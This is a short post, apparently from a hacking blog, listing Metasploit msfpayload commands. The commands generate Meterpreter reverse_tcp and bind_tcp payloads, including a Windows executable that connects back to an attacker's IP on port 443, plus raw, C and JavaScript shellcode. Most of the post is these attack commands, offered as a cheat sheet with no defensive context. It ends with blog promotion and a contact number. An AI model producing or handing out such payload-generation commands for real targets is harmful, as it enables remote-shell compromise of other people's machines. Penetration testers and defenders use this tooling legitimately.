Metasploit :- Payload Commands


Blackhattrick | Metasploit - Payload Commands

Here is a list with the available payload commands.


msfpayload -l
List available payloads

msfpayload windows/meterpreter/bind_tcp O

List all available options for the windows/meterpreter/bind_tcp payload

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=443 X >
payload.exe
Create a Meterpreter reverse_tcp payload to connect back to our IP on port 443.Then saves it as Windows executable file with the name payload.exe

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=443 R >
payload.raw

Create a Meterpreter reverse_tcp payload to connect back to our IP and saves it as raw format.It can be combined with msfencode.

msfpayload windows/meterpreter/bind_tcp LPORT=443 C > payload.c

Export as C-formatted shellcode

msfpayload windows/meterpreter/bind_tcp LPORT=443 J > payload.java
Export as %u encoded JavaScript


Share Your Knowledge................................by comment -Regards, Blackhattrick blog (sms GeniusHacker on 9870807070)or http://labs.google.co.in/smschannels/channel/GeniusHacker
Metasploit :- Payload Commands Metasploit :- Payload Commands Reviewed by BlackHat on 11:19 AM Rating: 5

Hacker Printed T- Shirt | Click on Image

Powered by Blogger.